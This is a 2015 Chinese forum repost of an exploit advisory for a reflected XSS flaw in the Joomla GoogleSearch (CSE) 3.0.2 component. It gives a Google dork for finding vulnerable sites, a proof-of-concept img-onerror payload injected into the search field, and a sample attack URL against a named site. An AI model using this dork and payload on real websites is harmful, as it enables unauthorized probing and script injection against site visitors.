本帖最后由 90_ 于 2015-9-2 12:08 编辑
[PHP] 纯文本查看 复制代码 ##############################################
#Exploit title: Joomla Component GoogleSearch (CSE) 3.0.2 - XSS Vulnerability
#Author: Bet0
#Google Dork: inurl:"index.php?option=com_googlesearch_cse"
#Date: 29 Agustus 2015
#Plugins Link: [url]http://extensions.joomla.org/extensions/7023/details[/url]
#Tested on: Mozila Firefox 40.0 and Ubuntu 15.04
##############################################
[+]Piye om Carane (PoC)
- Go to Columns Search Input The malicious code "><img src=x onerror=prompt(1)>
复制代码
[+]Sample
- http://ihonker.org/index.php?option=com_googlesearch_cse&n=30&Itemid=97&cx=005488517870211354079%3Ao9aiibgwgqs&cof=FORID%3A11&ie=ISO-8859-1&q="><img src=x onerror=prompt(1)>&sa=Search&hl=en&safe=active&siteurl=https%3A%2F%2Fwww.08sec.com
复制代码 |